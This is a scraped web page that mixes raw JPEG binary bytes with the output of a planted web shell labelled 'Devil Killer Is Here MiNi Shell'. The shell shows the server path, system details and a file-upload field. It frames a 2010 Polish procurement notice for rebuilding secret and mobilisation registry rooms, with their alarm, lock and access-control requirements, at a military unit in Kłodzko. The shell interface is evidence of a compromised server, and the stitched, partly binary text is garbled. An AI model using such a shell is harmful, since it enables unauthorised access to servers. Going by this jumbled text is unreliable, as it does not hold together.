JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/277228-N-2010.html

<p class="kh_header"><b>Wrocław: WYKONANIE PRZEBUDOWY POMIESZCZEŃ KANCELARII TAJNEJ I MOBILIZACYJNEJ ORAZ DOSTOSOWANIE KONTROLI DOSTEPU DO STREF BEZPIECZEŃSTWA, W BUDYNKU NR 4 W KOMPLEKSIE KOSZAROWYM EKSPLOATOWANYM PRZEZ JW. 4161 KŁODZKO.</b><br>
<b>Numer ogłoszenia: 277228 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PRZEBUDOWY POMIESZCZEŃ KANCELARII TAJNEJ I MOBILIZACYJNEJ ORAZ DOSTOSOWANIE KONTROLI DOSTEPU DO STREF BEZPIECZEŃSTWA, W BUDYNKU NR 4 W KOMPLEKSIE KOSZAROWYM EKSPLOATOWANYM PRZEZ JW. 4161 KŁODZKO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Część ogólna (CPV 45111200-0) obejmuje:
2.1.1. Organizacja terenu budowy.
Teren budowy zorganizować i wyposażyć, na czas prowadzenia robót
budowlanych, staraniem i na koszt Wykonawcy robót.
Zaplecze budowy zorganizować w miejscu wskazanym przy przekazywaniu
placu budowy przy udziale przedstawicieli Zamawiającego i Wojskowej Administracji
Koszar w Kłodzku, ustawiając tymczasowe baraki: biura budowy, socjalne oraz
przenośne sanitariaty typu TO I-TOI.
2.1.2. Demontaż, utylizacja, odzysk.
Demontażowi i utylizacji podlegają stolarka okienna i drzwiowa, a inne
materiały po zdemontowaniu należy przekazać do Wojskowej Administracji Koszar w
Kłodzku.
Gruz po wykuciu otworów drzwiowych, odbicia tynków, należy wywieźć na
wysypisko.
Koszty utylizacji i składowania gruzu, oraz pomiarów powykonawczych i inne
występujące a nie wymienione w przedmiarach robót ująć w kosztach pośrednich.
2.1.3. Rozbiórki.
Projektowana przebudowa wymaga wykonania robót rozbiórkowych jak niżej:
a. demontaż stolarki drzwiowej i okiennej wraz z ościeżnicami,
b. rozebranie ścian działowych.
c. wykucie otworów w ścianach na prowadzenie otworów wentylacyjnych,
d. zerwanie wykładzin podłogowych
Szczegółowy zakres robót rozbiórkowych ujęty został w projekcie budowlano -
wykonawczym oraz w przedmiarach robót.
2.1.4. Roboty murowe. (CPV 45262522-6)
Roboty murowe realizować zgodnie z projektem budowlano - wykonawczym,
przedmiarami robót oraz specyfikacji technicznej wykonania i odbioru robót.
Główny zakres robót murowych:
a) zamurowanie otworów drzwiowych w ścianie cegłami pełnymi,
b) wykonanie ścianek działowych z bloczków betonowych o grubości 15 cm,
które posadowić na stalowych dwuteownikach osadzonych w gniazdach
wykutych w ścianach nośnych budynku,
c) wykonanie ścianek działowych lekkich o konstrukcji aluminiowej.
2.1.8. Roboty tynkowe i okładzinowe. (CPV 45410000-4,045432210-9)
a) wykonanie nowych pogrubionych tynków wewnętrznych cementowowapiennych
na ścianach i po zamurowaniu otworu,
b) uzupełnienie tynków po wymianie ościeżnic drzwiowych oraz na ścianie po
założeniu nadproża.
2.1.8. Podłogi i posadzki. (CPV 45432110-8)
a) po miejscowej rozbiórce posadzek w obrębie wymienianych ościeżnic
drzwiowych, posadzkę cementową naprawić, uzupełnić powierzchnię
posadzki poprzez zamontowanie progu wewnętrznego oraz naprawić
posadzkę w drzwiach wejściowych do kancelarii,
b) w pomieszczeniach podlegających przebudowie ułożyć nowe posadzki.
2.1.9. Stolarka drzwiowa. CPV 45421120-1)
a) Drzwi wejściowe z korytarza do kancelarii tajnej i mobilizacyjnej klasy A
muszą spełniać następujące wymagania:
Być wykonane jako konstrukcja stalowa zabezpieczona przed włamaniem od
strony zawiasów, wyposażone w dwa zamki w tym jeden mechaniczny
szyfrowy o zmiennym nastawieniu szyfrowym, co najmniej trzytarczowy o
cichym przesuwie skoku nastawień nie większym niż jedna działka,
posiadający co najmniej 100 podziałek na tarczy (Zarządzenie nr 49/MON
Ministra Obrony Narodowej z dnia 5 sierpnia 2002 r. w sprawie szczególnych
zasad organizacji kancelarii tajnych, stosowania środków ochrony fizycznej
oraz obiegu informacji niejawnych).
Zawiasy drzwi powinny być umieszczone od wewnątrz. W przypadku
zawiasów umieszczonych na zewnątrz ich sworznie powinny być zalutowane
mosiądzem lub zaspawane - w celu uniemoSliwienia prób nieuprawnionego
zdjęcia drzwi,
Rama i mocowania powinny być przynajmniej równie mocne jak same drzwi
i być głęboko zakotwione w murze, uniemożliwiając jej usunięcie przez
podważenie, wyposażone w dwa niezależne zamki (posiadające atest
Instytutu Mechaniki Precyzyjnej lub KG Policji) w tym o jednym
skomplikowanym mechanizmie otwierania i drugi zamek szyfrowy o zmiennym
nastawieniu klasy A (klasa określona wg standardów NATO opisanych w
Dyrektywie AD 70-1). Zamek szyfrowy powinien być co najmniej
trzyzapadkowy, o cichym przesuwie skali nastawień nie więcej niż 1 działka i
minimum 100 podziałkach na pokrętle. Zmiana kombinacji w zamku
szyfrowym powinna być blokowana i uaktywniana kluczem, od tyłu skrzynki
zamka. Zamek musi posiadać zabezpieczenie przeciwko manipulacji.
Ponadto powinien on być zabezpieczony przeciwko prześwietleniu
radiologicznemu i zabezpieczony przed przewierceniem. Zamek powinien
zawierać również mechaniczne środki zabezpieczające przed przekręceniem
jego rygla w momencie, gdy znajduje się on w pozycji zamkniętej (np. w
momencie, gdy usiłowane jest wtargnięcie do wnętrza obudowy zamka przy
użyciu siły), posiadać element zatrzaskowy uniemożliwiający pozostawienie
pomieszczenia w stanie otwartym. Elementem takim może być dodatkowy
zamek lub elektrozwora, posiadać wizjer i samozamykacz, drzwi dodatkowo
wyposażyć w urządzenia umożliwiające stwierdzenie przez użytkowników
pomieszczeń prób nieuprawnionego otwarcia (np. plomby plastelinowe,
jednorazowe plomby plastikowe, liczniki otwarcia drzwi, sygnalizatory
elektroniczne itp.)
Drzwi zabezpieczeniowe klasy A muszą posiadać tabliczkę znamionową
z następującymi danymi:
- nazwa producenta
- rodzaj wyrobu,
- nr fabryczny,
- klasa odporności,
- nr certyfikatu i przez kogo wydany,
- ciężar.
2.1.10. Stolarka i ślusarka okienna CPV 45421120-1)
Osadzić okna z PCW jednoramowe, szklone okien szkłem zespolonym
U = 1,1 W/m2K, wartość U dla całego okna nie mniej niS 2,3 W/m2°K; Okna
wyposażyć w nawietrzaki higrosterowne;
Zamontować kraty stalowe oznaczone na rysunku (Kr1), wspawane w ramę z
płaskownika 45/6mm, pręty okrągłe o20 lub 20/20mm w rozstawie nie
większym niż 150mm, wzmocnione dodatkowo płaskownikiem 45/6mm co
300mm. Dodatkowo w oknach zamontować siatkę stalową o oczkach nie
większych niż 15/15mm. Rama kraty winna być osadzona tak by odstęp od
ościeży zewnętrznych do ramy kraty nie był większy niż 1cm. Szyby w oknach
zabezpieczyć folią uniemożliwiającą wgląd z zewnątrz.
2.1.11. Malowanie. (CPV 45410000-4)
a) po robotach budowlanych i instalacyjnych, dokonać malowania ścian i sufitów
w pomieszczeń kancelarii oraz uzupełniającego po wymianie ościeżnic
drzwiowych na korytarzu,
b) malowanie dwukrotne pomieszczeń sufitów w kolorze białym a ścian w
kolorach jasnych - kremowych dwukrotnie, farbami lateksowymi,
c) na korytarzach lamperie wysokości 1,5 m malować farbami olejnymi,
d) stolarka drzwiowa malowana proszkowo i drewniana winna być dostarczona w
stanie gotowym.
2.1.12. Posadzki
e) mycie posadzek po robotach budowlanych, instalacyjnych i malarskich,
f) na czas robót posadzki zabezpieczyć grubą folią malarską podwójnie.
3. INSTALACJE SANITARNE
W zakresie modernizacji pomieszczeń kancelaryjnych w branży sanitarnej
wykonać:
3.1. zamontować separatory na zasilaniu i powrotach instalacji centralnego
ogrzewania,
3.2 W kubaturze pomieszczeń kancelaryjnych wykonać układ wentylacji. Kanały
ciągów wentylacyjnych wykonać w technice lekkiej, stosując przewody typu
SPIRO lub równoważne, z kratkami wentylacyjnymi zabezpieczonych siatką i
drzwiczkami żaluzjowymi. Wloty przewodów wentylacyjnych zabezpieczyć
przed penetracją z zewnątrz siatką stalową o oczkach nie większych jak
10/10 mm.
4. BRANżA ELEKTRYCZNA (CPV45310000-3).
4.1. Instalacje WLZ i rozdzielni (CPV45310000-3).
Dla wydzielonych pomieszczeń kancelarii wykonać nowe rozdzielnie, do których
wykonać wewnętrzną linię zasilającą z istniejącej rozdzielni budynku. Z rozdzielni
poprowadzić obwody zasilające oświetlenie i gniazda dla każdego rodzaju instalacji
osobno.
4.2. Instalacje oświetlenia, gniazd wtykowych ~230V (CPV45311000-0).
Oświetlenie wykonać w pomieszczeniach kancelaryjnych stosując oprawy z
jarzeniowymi źródłami światła. Instalacje oświetlenia ogólnego i gniazd wtykowych
230 V podtynkowe przewodami YDYp lub YDY 450/750V. Wykonać odrębne obwody
dla gniazd wtykowych i oświetlenia które poprowadzić z rozdzielni obiektowej części
budynku.
4.2.1. Instalacja oświetlenia ewakuacyjnego.
Dla pomieszczeń kancelaryjnych nad drzwiami wyjściowymi z pomieszczeń
wykonać oświetlenie ewakuacyjne, zainstalować lampy z rezerwowym źródłem
zasilania, których czas podtrzymania świecenia winien wynosić 3h z oznakowaniem
wskazującym wyjście i kierunki ewakuacji.
4.3. Instalacja zasilania - systemów alarmowych (CPV45311000-1).
Dla potrzeb zasilania systemów alarmowych naleSy wykonać wydzielone
obwody z rozdzielni obiektowej do urządzeń alarmowych , Wykonać instalację dla
każdego z systemów osobno zgodnie z opracowaniem projektowym.
4.4. Ochrona przeciwporażeniowa i przeciwprzepięciowa.
Dla ochrony przeciw porażeniowej zastosować samoczynne szybkie wyłączanie
zasilania napięcia, a dla ochrony przeciw przepięciowej zastosować ochronnik
przepięć dwustopniowe.
4.5. Pomiary powykonawcze. (CPV45317000-2).
. Pomiary rezystancji izolacji kabli i przewodów.
. Pomiary skuteczności ochrony przeciwporaSeniowej.
. Pomiary skuteczności samoczynnego szybkiego wyłączania zasilania
wyłączników różnicowoprądowych.
. Pomiary uziemień ochronnych.
. Pomiary instalacji połączeń wyrównawczych.
. Pomiary natęSenia oświetlenia.
5. Instalacja alarmowe przebudowywanych pomieszczeń kancelarii tajnej
i mobilizacyjnej o klauzuli ZASTRZEżONE
1. Instalację alarmową - System Sygnalizacji Włamania i Napadu (SSWiN).
2. Instalację kontroli dostępu (KD).
3. Instalację sygnalizacji alarmowej pożaru (SAP).
4. Instalacja telewizji obserwacyjnej (CCTV).
5.1. System Sygnalizacji Włamania i Napadu (SSWiN)
Dla ochrony pomieszczeń kancelarii tajnej i mobilizacyjnej należy wykonać System
Sygnalizacji Włamania i Napadu w klasy SA-4 z urządzeniami klasy S. poprzez
rozbudowę istniejącego systemu. Doprowadzić linie dla potrzeb transmisji alarmu do
centrum nadzoru gdzie jest pełniona całodobowa służba.
Dla systemu zapewnić źródło zasilania podstawowego i rezerwowego, które zapewni
normalną pracę w stanie dozorowania i w stanie alarmu w czasie określonym w
instrukcji Szt. Gen. 1569/2004 przy spełnieniu odpowiednich warunków dotyczących
dozoru ludzkiego i świadczenia usług serwisowych. Przy powstaniu awarii zasilania
fakt ten powinien być sygnalizowany w centrum nadzoru. Wyposażyć
pomieszczenia kancelarii i centrum nadzoru w dodatkowe urządzenia podłączone do
systemu alarmowego takie jak - przyciski napadowe i przyciski umożliwiające
przesłanie sygnału pomocy medycznej z pomieszczeń kancelarii do centrum
nadzoru.
5.2. System kontroli dostępu (KD).
Wykonać system kontroli dostępu w oparciu o zbliżeniowe pasywne karty
dostępu. Określić klasę dostępu z zastosowaniem siatki czasu oraz rejestracji
zdarzeń. Dla systemu wykonać źródło zasilania podstawowego i rezerwowego, które
zapewni normalną pracę w stanie dozorowania i w stanie alarmu w czasie nie
krótszym niż 72 h. Przyłączenie lub odłączenie zasilania nie powinno powodować
błędnych odblokowań. System musi zawierać możliwość przedstawienia alarmu oraz
wyświetlenie informacji w przypadku zajścia sabotażu, nieuprawnionego otwarcia,
stanu otwarcia po upływie przyznanego czasu. NaleSy zamontować wyłączniki
awaryjne umożliwiające natychmiastowe odblokowanie urządzeń kontroli dostępu na
wypadek zagroSenia.
5.3. Instalacja sygnalizacji alarmowej pożaru (SAP) (CPV45312100-8).
Dla ochrony przeciwpożarowej obiektu wykonać rozbudowę istniejącego systemu
alarmu pożaru do ochrony wyznaczonych pomieszczeń. System sygnalizacji
alarmowej wykonać jako odrębny i niezaleSny od innych instalacji. Wykonać dwa
niezależne tory transmisji alarmu (np. kablowy i radiowy).
5.4. System telewizji przemysłowej (CCTV) (CPV45312000-7).
System telewizji oobserwacyjnej wykonać w celu prowadzenia ciągłego nadzoru
obserwacji zewnętrznej drzwi wejściowych i okien kancelarii tajnej, kancelarii
mobilizacyjnej. Rozmieszczenie kamer należy wykonać w taki sposób aby
maksymalnie wykorzystać ich pole widzenia. Stanowisko dozoru wizyjnego wykonać
w pomieszczeniu oficera dyżurnego z podglądem ze wszystkich zainstalowanych
kamer.
Zasilanie awaryjne powinno zapewnić ciągłą pracę systemu w czasie nie
krótszym niż 4 h. Instalację systemu telewizji przemysłowej wykonać w rurkach
ochronnych pod tynkiem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości- 11 100,00 zł.
Wadium należy wnieśc do dnia 20.09.2010 do godz. 10.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia, realizowanych w formie zabezpieczenia techniczneg.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać doświadczenie w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, że jako główny 
Wykonawca wykonał co najmniej:
a) jedną rozbudowę lub remont obiektu kubaturowego o konstrukcji tradycyjnej,     
o wartości robót nie mniejszej niż 350 000,00 zł (brutto).
Na potwierdzenie w/w warunku należy załączyć wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, dat i miejsc wykonania wraz z załączeniem dokumentów potwierdzających, że roboty zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Formularz nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że dysponuje kierownikiem budowy i kierownikami
robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu
zawodowego:
a) kierownik budowy - w zakresie konstrukcyjno - budowlanym - bez
ograniczeń;
b) kierownik robót instalacyjnych w zakresie sieci, instalacji urządzeń 
elektrycznych i elektroenergetycznych - bez ograniczeń;
c) kierownik robót instalacji teletechnicznych wewnętrznych w zakresie    
wykonywania instalacji systemów alarmowych SSWiN posiadający licencje   
pracownika zabezpieczeni   technicznego II stopnia wydaną przez KPW,  
instalacji systemu alarmu pożaru SAP posiadanie autoryzacji producenta na 
wykonywanie montażu przewidzianych do realizacji urządzeń, a dla robót 
teletechnicznych zewnętrznych (budowa kanalizacji teletechnicznej) posiadanie uprawnień budowlanych w specjalności teletechnicznej.
2. Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu
zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
3. Wykonawca musi wykazać, ze dysponuje pełnomocnikiem ochrony informacji niejawnych;
4. Wykonawca musi wykazać, ze dysponuje osobami zdolnymi do wykonania
przedmiotu zamówienia w zakresie wykonania instalacji (SSWiN i KD), którzy
muszą posiadać licencje techniczne:
a) pracownicy kierującymi robotami - licencje techniczne II stopnia,
b) pracownicy wykonujący roboty - licencje techniczne I stopnia.
Instalatorzy i projektanci systemów alarmowych powinni posiadać  świadectwa odbycia szkolenia i autoryzacji w zakresie instalowania i projektowania systemów klasy SA - 4. 
Osoby kierujące pracami wykonania systemów alarmowych oraz monterzy systemów alarmowych poświadczenie bezpieczeństwa minimum o klauzuli ZASTRZEŻONE;
5. Wykonawca powinien posiadać certyfikaty lub świadectwa kwalifikacyjne 
na urządzenia alarmowe przewidziane do instalacji w obiektach wojskowych.
Na potwierdzenie w/w warunku Wykonawca musi załaczyć wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami  - Formularz nr 4.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki obrotowe lub zdolność kredytową, na kwotę  nie mniejszą niż 300 000,00 zł (brutto).
Wykonawca na potwierdzenie w/w warunku należy dostarczyć  informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - Formularz nr 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

